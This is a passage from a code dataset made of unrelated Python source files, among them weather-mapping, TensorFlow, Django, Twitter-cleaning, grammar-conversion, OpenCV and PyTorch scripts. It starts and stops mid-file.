'2012-12-10') and snow >= 0 and \n x(geom) BETWEEN %s and %s and\n y(geom) BETWEEN %s and %s \n GROUP by id, lon, lat ORDER by sum DESC\n \"\"\", (iemre.WEST, iemre.EAST, iemre.SOUTH, iemre.NORTH))\n for row in icursor:\n\n vals.append( row[1] )\n lats.append( row[3] )\n lons.append( row[2] )\n return {'vals': vals, 'lats': lats, 'lons': lons}\n\nsnowgrid = init_grid() # inches\n\"\"\"\nlsrs = fetch_lsrs()\ncoop = fetch_coop()\n\nlats = []\nlons = []\nvals = []\n\nfor i in range(len(lsrs['vals'])):\n x, y = sg2pt(lsrs['lons'][i], lsrs['lats'][i])\n #print snowgrid[y,x], lsrs['vals'][i], x, y, lsrs['lons'][i], lsrs['lats'][i]\n sg = snowgrid[y,x]\n if lsrs['vals'][i] > sg:\n lats.append( lsrs['lats'][i] )\n lons.append( lsrs['lons'][i] )\n vals.append( lsrs['vals'][i] )\n\"\"\"\n\n\nmp = MapPlot(sector='midwest')\nmp.contourf(iemre.XAXIS, iemre.YAXIS, snowgrid, range(0,20))\nmp.postprocess(view=True)","sub_path":"scripts/current/snow_analysis.py","file_name":"snow_analysis.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"569601314","text":"import pickle\nfrom .CreateHuman import man, woman\n\nclass Earth:\n\n def __init__(self):\n print('Welcome to the human configurator')\n self.menu = [\n ['Add a man', man],\n ['Add a woman', woman],\n ]\n self.humans = []\n\n def add_humans(self):\n print()\n for i, item in enumerate(self.menu):\n print(f'{i} - {item[0]}')\n print()\n num = int(input('Enter the person number: '))\n self.humans.append(self.menu[num][1]())\n\n def edit_humans(self):\n for i, humans in enumerate(self.humans):\n print(humans.__class__.__name__+'[id: '+str(i)+']')\n self.humans[int(input('Enter the person number: '))].edit()\n print('--------------------')\n print('Changes saved')\n\n def delete_humans(self):\n self.humans.pop(int(input('Enter the person number: ')))\n\n def delete_all(self):\n self.humans.clear()\n print(' \n \n The meteor has launched \n . \n . \n . \n . \n . \n . \n It has arrived')\n\n def show_humans(self):\n for i, humans in enumerate(self.humans):\n print()\n print(humans.__class__.__name__+'[id:'+str(i)+']')\n humans.print()\n\n def save_humans(self):\n f = open(r'data.txt', 'wb')\n pickle.dump(self.humans, f)\n f.close()\n print('The list has been saved')\n\n def load_humans(self):\n f = open(r'data.txt', 'rb')\n self.humans = pickle.load(f)\n print('The list has been loaded')\n","sub_path":"asm1905/st14/Earth.py","file_name":"Earth.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244373176","text":"\"\"\"\nneed to save the histogram bins for visualization purposes still,\nas well as cosmetics such as axis labels and region names\n\"\"\"\nimport logging\nfrom pathlib import Path\n\nfrom . import histo\n\n\nlog = logging.getLogger(__name__)\n\n\ndef _build_figure_name(region, is_prefit):\n \"\"\"construct a name for the file a figure is saved as\n\n Args:\n region (str): name of the region shown in the figure\n is_prefit (bool): whether the figure shows the pre- or post-fit model\n\n Returns:\n str: name of the file the figure should be saved to\n \"\"\"\n figure_name = region.replace(\" \", \"-\")\n if is_prefit:\n figure_name += \"_\" + \"prefit\"\n else:\n figure_name += \"_\" + \"postfit\"\n figure_name += \".pdf\"\n return figure_name\n\n\ndef data_MC(config, histogram_folder, figure_folder, prefit=True, method=\"matplotlib\"):\n \"\"\"draw a data/MC histogram, control whether it is pre- or postfit with a flag\n\n Args:\n config (dict): cabinetry configuration\n histogram_folder (str): path to the folder containing template histograms\n figure_folder (str): path to the folder to save figures in\n prefit (bool, optional): show the pre- or post-fit model, defaults to True\n method (str, optional): what backend to use for plotting, defaults to \"matplotlib\"\n\n Raises:\n NotImplementedError: when trying to plot with a method that is not supported\n NotImplementedError: when trying to visualize post-fit distributions, not supported yet\n \"\"\"\n log.info(\"visualizing histogram\")\n for region in config[\"Regions\"]:\n histogram_dict_list = []\n for sample in config[\"Samples\"]:\n for systematic in [{\"Name\": \"nominal\"}]:\n is_data = sample.get(\"Data\", False)\n histogram, _ = histo.load_from_config(\n histogram_folder, sample, region, systematic, modified=True\n )\n histogram_dict_list.append(\n {\n \"label\": sample[\"Name\"],\n \"isData\": is_data,\n \"hist\": histogram,\n \"variable\": region[\"Variable\"],\n }\n )\n\n
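 # all samples for this region have been collected; build the figure file name\n # and hand the histogram stack to the chosen plotting backend\n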
 figure_name = _build_figure_name(region[\"Name\"], prefit)\n\n if prefit:\n if method == \"matplotlib\":\n from cabinetry.contrib import histogram_drawing\n\n figure_path = Path(figure_folder) / figure_name\n histogram_drawing.data_MC_matplotlib(histogram_dict_list, figure_path)\n else:\n raise NotImplementedError(\"unknown backend\")\n else:\n raise NotImplementedError(\"only prefit implemented so far\")\n","sub_path":"src/cabinetry/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"130606823","text":"import tensorflow as tf\nimport pickle\nimport data_reader\nimport sys\n\nRATE = .001\n\ndef predict(num_attributes, num_labels, NEURONS, instance):\n sess = tf.Session()\n\n # Set up placeholders for training attribute and label values\n x = tf.placeholder(tf.float32, shape=[None, num_attributes])\n y = tf.placeholder(tf.float32, shape=[None, num_labels])\n\n # Weights and biases for first hidden layer\n w_hidden = tf.Variable(tf.truncated_normal([num_attributes, NEURONS], stddev=0.1))\n b_hidden = tf.Variable(tf.constant(0.1, shape=[NEURONS]))\n\n # Output of first hidden layer\n net_hidden = tf.matmul(x, w_hidden) + b_hidden\n out_hidden = tf.sigmoid(net_hidden)\n\n w_output = tf.Variable(tf.truncated_normal([NEURONS, num_labels], stddev=0.1))\n b_output = tf.Variable(tf.constant(0.1, shape=[num_labels]))\n\n net_output = tf.matmul(out_hidden, w_output) + b_output\n\n if num_labels == 1: # Activation and loss functions for binary predictions\n prediction = tf.sigmoid(net_output)\n loss = tf.reduce_sum((y - prediction) * (y - prediction))\n else: # activation and loss functions for multinomial regression\n prediction = tf.nn.softmax(net_output)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=net_output))\n\n backprop = tf.train.AdamOptimizer(RATE).minimize(loss) # Set up backprop with given loss function\n\n saver = tf.train.Saver()\n saver.restore(sess, \"/tmp/model.ckpt\")\n\n p = sess.run(prediction, feed_dict = {x : [instance]})\n return p[0][0]\n\n\n\ndef main():\n file_name = sys.argv[1]\n pickle_file = open(file_name, 'rb')\n attribute_values, num_attributes, neuron_num = pickle.load(pickle_file)\n fed_instance = sys.argv[2:]\n\n instance = data_reader.one_hot_coding(fed_instance, attribute_values)\n\n result = predict(num_attributes, 1, neuron_num, instance)\n if result <= .5:\n print(0)\n else:\n print(1)\n\nmain()","sub_path":"neural/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518110773","text":"import TwitterAPI\nimport re\nfrom datetime import datetime, timedelta\n\nsamples = ['@BarackObama',\n '@katyperry',\n '@justinbieber',\n '@rihanna',\n '@taylorswift13',\n '@Cristiano',\n '@ladygaga',\n '@TheEllenShow',\n '@elonmusk',\n '@ArianaGrande',\n '@realDonaldTrump',\n '@jtimberlake',\n '@KimKardashian',\n '@selenagomez',\n '@POTUS',\n '@britneyspears',\n '@cnnbrk',\n '@shakira',\n '@narendramodi',\n '@jimmyfallon']\n\nemoji_pattern = re.compile(\"[\"\n u\"\\U00002070-\\U0010FFFF\" # Everything that is not Latin Alphabet\n\n # U\"\\U00002700-\\U000027BF\" # Dingbats \n # u\"\\U0001F600-\\U0001F64F\" # emoticons\n # u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n # u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n # 
u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n\n\ndef get_clean_tweets(tmln):\n clean_tweets = []\n for tweet in tmln:\n clean_tweet = re.sub(r'https://t.co/[a-zA-Z0-9./_\\-]+', '', tweet.full_text) # Remove links\n clean_tweet = clean_tweet.replace('\\n', ' ') # Remove new line symbols\n clean_tweet = emoji_pattern.sub(r' ', clean_tweet) # Remove symbols (non-Latin Alphabet)\n clean_tweet = clean_tweet.strip() # Strip extra whitespace\n if len(clean_tweet) > 0: # Check that tweet wasn't just a link or emoji, has actual text\n clean_tweets.append(clean_tweet)\n else:\n pass\n\n return clean_tweets\n\n\nif __name__ == \"__main__\":\n check_day = datetime.strftime(datetime.today() - timedelta(days=1), '%a %b %d')\n\n tweets = []\n\n for user in samples:\n timeline = TwitterAPI.get_tweets(user, check_day)\n\n if len(timeline) > 0:\n tweets.append(' '.join(get_clean_tweets(timeline)))\n else:\n continue\n\n str_tweets = ' '.join(tweets)\n\n # with open('/home/william/PycharmProjects/hegebot/text.txt', 'a') as file:\n # file.write(str_tweets)\n","sub_path":"GetTrainText.py","file_name":"GetTrainText.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"219086382","text":"#!/usr/bin/python3\n\nimport sys\n\n\ndef nacci(n, count):\n seq = [0] * (n - 1) + [1]\n for i in range(count):\n seq.append(sum(seq[-n:]))\n return seq[n-2:]\n\n\ndef format_seq(seq):\n for el in seq:\n print(f\"& {el} \", end=\"\")\n print()\n\n\nformat_seq(nacci(int(sys.argv[1]), int(sys.argv[2])))\n","sub_path":"nacci.py","file_name":"nacci.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588895987","text":"from django.contrib.admin import widgets\nfrom django.utils.safestring import mark_safe\n\nclass MultiFileInput(widgets.AdminFileWidget):\n\n def render(self, name, value, attrs=None):\n attrs['multiple'] = 'true'\n output = super(MultiFileInput, self).render(name, value, attrs=attrs)\n return mark_safe(output)\n\n# Add the word \"mini\" to an image file name\ndef _add_mini(link):\n mini_jpg = link.split(\".\")\n mini_jpg.insert(-1,\"mini\")\n if mini_jpg[-1].lower() not in ['jpeg','jpg']:\n mini_jpg[-1]='jpeg'\n return \".\".join(mini_jpg)\n\ndef nomeric(n):\n a = 1\n for i in n:\n a += 1\n return a\n\n\ndef switch_lang_to_ua(url):\n if 'ua' not in url:\n direct = str(url).split('/')\n direct.insert(1,'ua')\n url_ua = '/'.join(direct)\n return url_ua\n elif 'ua' in url:\n return url\n\ndef switch_lang_ru(url):\n if 'ua' in url:\n direct = str(url).split('/')\n direct.remove('ua')\n url_ru = '/'.join(direct)\n return url_ru\n else:\n return url\n\n\nif __name__ == '__main__':\n print('Need to import this module.')","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"126843297","text":"def average(amount):\n #I'll write the code to find the average of a set of arrays here\n avarray = []\n for i in range(amount):\n array = raw_input().split(' ')\n array = map(int, array)\n ave = round(sum(array) / (float(len(array) - 1)), 0)\n avarray.append(int(ave))\n print(\"[{}]\".format(\" \".join(map(str, avarray))))\n\naverage(input())\n","sub_path":"Code Abbey Problem 16.py","file_name":"Code Abbey Problem 
16.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148887368","text":"import nltk, copy, collections\n\n\nclass CFNDataStructures():\n\n __grammarProductions = set()\n __startProductionRules = set()\n __unitProductionRules = set()\n __hybridProductionRules = set()\n __longProductionRules = set()\n __cnfRules = set()\n __nonTerminals = set()\n __removeProductionRules = set()\n __nonTerminalsDict = {}\n __newProductions = set()\n __terminalProductions = set()\n __originalGrammarProductionCount = 0\n __newRuleCounter = 1\n __grammarProductionCount = 0\n __unitProductionRulesCount = 0\n __hybridProductionRulesCount = 0\n __longProductionRulesCount = 0\n __cnfRulesCount = 0\n __nonTerminalsCount = 0\n __removeProductionRulesCount = 0\n __terminalProductionsCount = 0\n __nonTerminalsDictCount = 0\n\n def __init__(self, grammarProductions):\n self.name = 'CFNDataStructures'\n #self.__startProductionRules = set()\n #self.unitProductionRules = set()\n #self.hybridProductionRules = set()\n #self.longProductionRules = set()\n #self.cnfRules = set()\n #self.nonTerminals = set()\n #self.removeProductionRules = set()\n #self.nonTerminalsDict = {}\n #self.newProductions = set()\n self.__grammarProductions = grammarProductions.copy()\n self.__setoriginalGrammarProductionCount(len(grammarProductions))\n\n print(\"CFNDataStructures --> Constructor\")\n\n def __setoriginalGrammarProductionCount(self,value):\n CFNDataStructures.__originalGrammarProductionCount = value\n\n def getstartProductionRules(self):\n return CFNDataStructures.__startProductionRules\n\n def getunitProductionRules(self):\n return self.__unitProductionRules\n\n def gethybridProductionRules(self):\n return self.__hybridProductionRules\n\n def getlongProductionRules(self):\n return self.__longProductionRules\n\n def getcnfRules(self):\n return self.__cnfRules\n\n def getremoveProductionRules(self):\n return self.__removeProductionRules\n\n def setnonTerminals(self):\n for i in self.__grammarProductions:\n self.__nonTerminals.add(i.lhs())\n for e in i.rhs():\n if isinstance(e,nltk.grammar.Nonterminal):\n self.__nonTerminals.add(e)\n\n\n\n def getnonTerminals(self):\n return self.__nonTerminals\n\n def getnonTerminalsDict(self):\n return self.__nonTerminalsDict\n\n def getnewProductions(self):\n return self.__newProductions\n\n def getgrammarProductions(self):\n return self.__grammarProductions\n\n def setterminalProductions(self,productionsList):\n for i in productionsList:\n if len(i.rhs()) == 1 and i.is_lexical():\n self.__terminalProductions.add(i)\n\n def getterminalProductions(self):\n return self.__terminalProductions\n\n #update production set\n def updateGrammarProductions(self):\n for prod in self.getremoveProductionRules():\n self.getgrammarProductions().discard(prod)\n self.getgrammarProductions().update(self.getnewProductions())\n\n #Long Rule Count - Do this first\n def toCNFLongRuleConversion(self):\n print(\"** Running Long Rule cnf conversion Analysis\")\n for prod in self.getgrammarProductions():\n if len(prod.rhs()) > 2:\n self.getlongProductionRules().add(prod)\n print(\"** Applying Long Rule cnf conversion to production [%s]\"%str(prod))\n self.getremoveProductionRules().add(prod)\n #tempProds = (prod)\n lhs = prod.lhs()\n rhsList = list(prod.rhs())\n\n while True:\n xTempNonTerminal = 'X'+str(self.__newRuleCounter)\n xNonTerminal = nltk.grammar.Nonterminal(xTempNonTerminal)\n tempRHSList = [rhsList.pop(0),rhsList.pop(0)]\n
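 #This loop binarizes a long rule A -> B C D ... by folding the first two RHS symbols\n #into a fresh nonterminal X (adding X -> B C) until the remaining RHS length is <= 2\n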
 newXProd = nltk.grammar.Production(xNonTerminal,tempRHSList)\n print(\"**New Production [%s] created\"%str(newXProd))\n self.getnonTerminals().add(xNonTerminal)\n self.getnewProductions().add(newXProd)\n rhsList.insert(0,xNonTerminal)\n if len(rhsList) <= 2:\n newEndProduction = nltk.grammar.Production(lhs,rhsList)\n print(\"**New Production [%s] created\"%str(newEndProduction))\n self.getnewProductions().add(newEndProduction)\n break\n self.__newRuleCounter += 1\n\n #update production set\n self.updateGrammarProductions()\n #End update of long rule\n\n #Hybrid Rule Conversion\n def toCNFHybridRuleConversion(self):\n print(\"** Running Hybrid Rule cnf conversion Analysis\")\n\n for prod in self.getgrammarProductions():\n\n if len(prod.rhs()) == 2 and not prod.is_nonlexical():\n print(\"** Applying Hybrid Rule cnf conversion to production [%s]\"%str(prod))\n self.gethybridProductionRules().add(prod)\n\n rhsIndex = 0\n tempRHSList = []\n for rhs in prod.rhs():\n if not isinstance(rhs,nltk.grammar.Nonterminal):\n print(\"Found terminal [%s] as a rhs attribute of production [%s]\"%(rhs,str(prod)))\n self.getremoveProductionRules().add(prod)\n #rhs = rhs.unicode_repr()\n newNonTerminal = nltk.grammar.Nonterminal(rhs)\n print(newNonTerminal._symbol)\n self.getnonTerminals().add(newNonTerminal)\n print(\"**New NonTerminal [%s] created from string [%s]\"%(str(newNonTerminal),str(rhs)))\n newProduction1 = nltk.grammar.Production(newNonTerminal,[rhs])\n print(\"**New Production [%s] created\"%str(newProduction1))\n self.getnewProductions().add(newProduction1)\n if rhsIndex == 0:\n tempRHSList.insert(0,prod.rhs()[1])\n else:\n tempRHSList.insert(0,prod.rhs()[0])\n tempRHSList.insert(rhsIndex,newNonTerminal)\n newProduction2 = nltk.grammar.Production(prod.lhs(),tempRHSList)\n print(\"**New Production [%s] created\"%str(newProduction2))\n self.getnewProductions().add(newProduction2)\n #End for-loop\n #End if\n #End for-loop\n #update production set\n self.updateGrammarProductions()\n\n\n #End function\n\n #End Hybrid Rule Conversion\n\n #Unit Production Rule Conversion\n def toCNFUnitProductionRuleConversion(self):\n print(\"** Running Unit Production Rule cnf conversion Analysis\")\n for prod in self.getgrammarProductions():\n if len(prod.rhs()) == 1 and prod.is_nonlexical():\n print(\"** Applying Unit Production Rule cnf conversion to production [%s]\"%str(prod))\n self.getunitProductionRules().add(prod)\n #End for-loop\n #get all leftcorner non-terminals per unit production\n newProductionSet = set()\n for unit in self.getunitProductionRules():\n unitLHS = unit.lhs()\n symbol = unit.lhs()\n notComplete = True\n count = 0\n while notComplete:\n #Outer Most Unit Set\n recursionCount = 0\n try:\n if symbol in self.getnonTerminalsDict():\n unitLFTCornerSet = self.getnonTerminalsDict().get(symbol)\n print(\"Symbol [%s], lftCornerSet [%s], recursion count [%d]\"%(str(symbol),str(unitLFTCornerSet),recursionCount))\n #unitLFTCornerSet = list(unitLFTCornerSet)\n if symbol in unitLFTCornerSet:\n unitLFTCornerSet.remove(symbol)\n isRecursion = False\n\n for item in unitLFTCornerSet:\n print(\"item [%s]\"%str(item))\n for i in self.getgrammarProductions():\n print(\"i [%s]\"%str(i))\n if i.lhs() == item:\n print(\"lhs [%s], item [%s]\"%(str(i.lhs()),str(item)))\n if len(i.rhs()) == 1:\n print(\"i rhs length [%d]\"%len(i.rhs()))\n if not isinstance(item,nltk.grammar.Nonterminal):\n print(\"Not instance of Nonterminal [%s]\"%str(item))\n #is a terminal, make new production for this unit\n newProduction =
 nltk.grammar.Production(unitLHS,i.rhs())\n newProductionSet.add(newProduction)\n self.getnewProductions().add(newProduction)\n print(\"**New Production [%s] created\"%str(newProduction))\n else:\n #recursive search\n print(\"Is a Nonterminal [%s]\"%str(item))\n symbol = i.rhs()[0]\n print(\"***INFO***: New leftcorner lookup value [%s]\"%str(symbol))\n if isinstance(symbol,nltk.grammar.Nonterminal):\n isRecursion = True\n recursionCount += 1\n raise StopIteration(\"StopIteration: Nonterminal Found, isRecursion[%s]\"%isRecursion)\n else:\n print(\"Not instance of Nonterminal [%s]\"%str(symbol))\n #is a terminal, make new production for this unit\n newProduction = nltk.grammar.Production(unitLHS,[symbol])\n newProductionSet.add(newProduction)\n self.getnewProductions().add(newProduction)\n print(\"**New Production [%s] created\"%str(newProduction))\n #raise StopIteration(\"StopIteration: Single terminal found\")\n else:\n #in CNF form, add new production\n #print(\"i rhs length > 1 [%d] i [%s]\"%(len(i.rhs()),str(i)))\n newProduction = nltk.grammar.Production(unitLHS,i.rhs())\n newProductionSet.add(newProduction)\n self.getnewProductions().add(newProduction)\n print(\"**New Production [%s] created\"%str(newProduction))\n #raise StopIteration(\"StopIteration: Multiple RHS found\")\n #end loop on grammar productions\n\n \n\n\n except StopIteration:\n print(\"StopIteration Raised, isRecursion[%s] notComplete[%s]\"%(isRecursion,notComplete))\n if isRecursion:\n continue\n else:\n notComplete = False\n else:\n print(\"Symbol [%s] not in nonterminal dict\"%str(symbol))\n notComplete = False #stop the lookup here, otherwise the while loop never terminates\n\n\n\n #mark unit production for removal\n self.getremoveProductionRules().add(unit)\n\n #End unit production search\n\n #update production set\n self.updateGrammarProductions()\n #End Unit Production Rule Conversion\n\n\n def printDataStructureReport(self):\n CFNDataStructures.__grammarProductionCount = len(self.getgrammarProductions())\n CFNDataStructures.__cnfRulesCount = len(self.getcnfRules())\n CFNDataStructures.__hybridProductionRulesCount = len(self.gethybridProductionRules())\n CFNDataStructures.__longProductionRulesCount = len(self.getlongProductionRules())\n CFNDataStructures.__nonTerminalsCount = len(self.getnonTerminals())\n CFNDataStructures.__unitProductionRulesCount = len(self.getunitProductionRules())\n CFNDataStructures.__removeProductionRulesCount = len(self.getremoveProductionRules())\n CFNDataStructures.__terminalProductionsCount = len(self.getterminalProductions())\n CFNDataStructures.__nonTerminalsDictCount = len(self.getnonTerminalsDict())\n print(\"***** CNF Data Structure Report: \\n*** grammarProductions count at start [%d]\"%CFNDataStructures.__originalGrammarProductionCount)\n print(\"*** grammarProductions count[%d]\"%CFNDataStructures.__grammarProductionCount)\n print(\"*** cnfRulesCount count[%d]\"%CFNDataStructures.__cnfRulesCount)\n print(\"*** hybridProductionRulesCount count[%d]\"%CFNDataStructures.__hybridProductionRulesCount)\n print(\"*** longProductionRulesCount count[%d]\"%CFNDataStructures.__longProductionRulesCount)\n print(\"*** nonTerminalsCount count[%d]\"%CFNDataStructures.__nonTerminalsCount)\n print(\"*** unitProductionRulesCount count[%d]\"%CFNDataStructures.__unitProductionRulesCount)\n print(\"*** removeProductionRulesCount count[%d]\"%CFNDataStructures.__removeProductionRulesCount)\n print(\"*** terminalProductionsCount count[%d]\"%CFNDataStructures.__terminalProductionsCount)\n print(\"*** nonTerminalsDict
 count[%d]\"%CFNDataStructures.__nonTerminalsDictCount)\n\n","sub_path":"assignments/ling_571_h2_context_free_parser/ling_utils/cnf_dataStructures.py","file_name":"cnf_dataStructures.py","file_ext":"py","file_size_in_byte":13848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224925800","text":"\"\"\"\nAuthor: Aggelos Kolaitis \nLast Update: 2019/04/25\nDescription: Gets machine info directly from MaaS\n\n# Usage:\n$ mjt_get_machine [system_id]\n\n# Notes\n* This script talks directly to the MaaS API, ignoring the local db\n\"\"\"\n\nimport json\nimport argparse\n\nfrom maasjuju_toolkit.util import session, exit_with_error, MaaSError\n\n\ndef get_machine(system_id):\n \"\"\"asks MaaS for information and prints it out\"\"\"\n\n try:\n m = session().Machine.read(system_id=system_id)\n except MaaSError as e:\n exit_with_error(f'[{system_id}] [ERROR] {e}')\n\n print(json.dumps({\n 'system_id': system_id,\n 'ip_addresses': ','.join(m['ip_addresses']),\n 'tags': ','.join(m['tag_names']),\n 'hostname': m['hostname'],\n 'domain': m['domain']['name'],\n 'fqdn': m['fqdn'],\n 'status': m['status_name']\n }, indent=2))\n\n\ndef main():\n \"\"\"calls get_machine()\"\"\"\n parser = argparse.ArgumentParser(\n description='Get machine details directly from MaaS'\n )\n parser.add_argument(\n 'system_id',\n type=str,\n )\n\n args = parser.parse_args()\n get_machine(args.system_id)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"maasjuju_toolkit/maas/get_machine.py","file_name":"get_machine.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116986871","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\n\nfrom .models import Timecard, TimecardObject\n\nclass TimecardForm(forms.ModelForm):\n class Meta:\n model = Timecard\n exclude = ['time_spent', 'reporting_period', 'user']\n\nclass TimecardObjectForm(forms.ModelForm):\n class Meta:\n model = TimecardObject\n fields = ['project', 'time_percentage']\n\nTimecardFormSet = inlineformset_factory(Timecard, TimecardObject)","sub_path":"tock/hours/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544716737","text":"import cv2\n\nvideo_capture = cv2.VideoCapture(0)\ncv2.namedWindow(\"cam-test\")\n\nimg_counter = 0\n\nwhile True:\n ret, frame = video_capture.read()\n\n if ret:\n cv2.imshow(\"cam-test\", frame)\n\n k = cv2.waitKey(1)\n\n if k & 0xFF == ord('s'): # s key pressed\n img_name = \"opencv_frame_{}.jpg\".format(img_counter)\n cv2.imwrite(img_name, frame) # frame: img\n print(\"{} written!\".format(img_name)) # print log\n img_counter += 1\n\n # compose the image file name as JSON\n '''\n data = {\n \"img_file_name\": img_name\n }\n '''\n\n if k & 0xFF == ord('q'):\n break\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"example/capture_image_by_webcam.py","file_name":"capture_image_by_webcam.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477308234","text":"# -*- coding: utf-8 -*-\n__author__ = 'ooo'\n__date__ = '2019/1/9 12:17'\n\nimport math, torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom xmodules.classifier import ViewLayer, AdaAvgPool, Activate\nfrom xmodules.transition import TransitionA\nfrom xmodules.rockblock import RockBlock, RockBlockQ, RockBlockX, RockBlockO\n
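# short alias for F.interpolate, used by the upsampling calls below\n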
polate = F.interpolate\n\n\n\"\"\"\n RealNet => RockBlock + DoubleCouple + SingleCouple + Summary(+merge +split) + BottleNeck\n\"\"\"\n\n\nclass DoubleCouple(nn.Module):\n _trans = {'A': TransitionA}\n\n def __init__(self, indepth, growth, active='relu', first=False, after=True, down=False,\n trans='A', reduce=0.5, convkp='T', inmode='nearest', classify=0, nclass=1000,\n last_branch=1, last_down=False, last_expand=0):\n super(DoubleCouple, self).__init__()\n assert last_branch <= 4, 'last_branch of DoubleCouple should be <= 4...'\n self.indepth = indepth\n self.growth = growth\n self.classify = classify\n self.nclass = nclass\n self.active = getattr(nn.functional, active)\n self.first = first\n self.after = after\n self.down = down\n self.trans = trans\n self.reduce = reduce\n self.trans_func = self._trans[trans]\n self.last_branch = last_branch\n self.last_down = last_down\n self.last_expand = last_expand\n self.inmode = inmode\n self.convkp = convkp\n kp = {'T': (3, 1), 'O': (1, 0)}[convkp]\n\n first_outdepth = indepth + growth if self.first else growth\n self.bn1 = nn.BatchNorm2d(indepth)\n self.conv1 = nn.Conv2d(indepth, first_outdepth, 3, stride=2, padding=1, bias=False, dilation=1)\n self.bn2 = nn.BatchNorm2d(indepth + growth)\n self.conv2 = nn.Conv2d(indepth + growth, growth, 3, stride=2, padding=1, bias=False, dilation=1)\n self.bn3 = nn.BatchNorm2d(indepth + growth)\n self.conv3 = nn.Conv2d(indepth + growth, growth, kp[0], stride=1, padding=kp[1], bias=False, dilation=1)\n self.bn4 = nn.BatchNorm2d(indepth + growth)\n self.conv4 = nn.Conv2d(indepth + growth, growth, kp[0], stride=1, padding=kp[1], bias=False, dilation=1)\n\n if self.classify > 0:\n self.classifier = nn.Sequential(\n nn.BatchNorm2d(indepth + growth),\n Activate(active),\n AdaAvgPool(),\n ViewLayer(dim=-1),\n nn.Linear(indepth + growth, nclass)\n )\n\n if self.after:\n if self.down:\n outdepth = int(math.floor((indepth + growth) * reduce))\n self.down_res4 = self.trans_func(indepth + growth, outdepth)\n self.down_res3 = self.trans_func(indepth + growth, outdepth)\n self.down_res2 = self.trans_func(indepth + growth, outdepth)\n self.down_res1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.last_down:\n outdepth = indepth + growth + last_expand\n if self.last_branch >= 1:\n self.down_last4 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 2:\n self.down_last3 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 3:\n self.down_last2 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 4:\n self.down_last1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.classify > 0 and self.last_branch == 4:\n # The middle layers of the last Couple are used as branch outputs and feed the Summary.\n # Delete this Couple's own classifier, so it does not duplicate the classifier in the Summary.\n delattr(self, 'classifier')\n self.classify = 0\n print('Note: 1 xfc will be deleted because it is duplicated by the lfc!')\n\n def forward(self, x):\n if isinstance(x, (list, tuple)):\n x1, x2, x3, x4, pred = x # big, middle, small, middle\n else:\n x1, x2, x3, x4, pred = x, None, None, None, None\n res1 = self.conv1(self.active(self.bn1(x1)))\n res1 = torch.cat((res1, x4), 1) if not self.first else res1\n res2 = self.conv2(self.active(self.bn2(res1)))\n res2 = torch.cat((res2, x3), 1)\n out = res2\n res3 = self.conv3(self.active(self.bn3(polate(res2, scale_factor=2, mode=self.inmode))))\n res3 = torch.cat((res3, x2), 1)\n res4 = self.conv4(self.active(self.bn4(polate(res3, scale_factor=2, mode=self.inmode))))\n
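 # conv1/conv2 downsample at stride 2 and conv3/conv4 act on 2x-upsampled maps, so\n # res1..res4 trace a down-down-up-up path with dense same-resolution concatenations\n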
res4 = torch.cat((res4, x1), 1)\n\n if self.classify > 0:\n out = self.classifier(out)\n else:\n out = None\n pred.append(out)\n\n if self.after:\n if self.down:\n res4 = self.down_res4(res4)\n res3 = self.down_res3(res3)\n res2 = self.down_res2(res2)\n res1 = self.down_res1(res1)\n return res4, res3, res2, res1, pred\n else:\n if self.last_branch == 1:\n if self.last_down:\n res4 = self.down_last4(res4)\n return res4, pred\n elif self.last_branch == 2:\n if self.last_down:\n res4 = self.down_last4(res4)\n res3 = self.down_last3(res3)\n return res4, res3, pred\n elif self.last_branch == 3:\n if self.last_down:\n res4 = self.down_last4(res4)\n res3 = self.down_last3(res3)\n res2 = self.down_last2(res2)\n return res4, res3, res2, pred\n elif self.last_branch == 4:\n if self.last_down:\n res4 = self.down_last4(res4)\n res3 = self.down_last3(res3)\n res2 = self.down_last2(res2)\n res1 = self.down_last1(res1)\n return res4, res3, res2, res1, pred\n else:\n raise ValueError(' of DoubleCouple should be <= 3!')\n\n\nclass SingleCouple(nn.Module):\n _trans = {'A': TransitionA}\n\n def __init__(self, indepth, growth, active='relu', first=False, after=True, 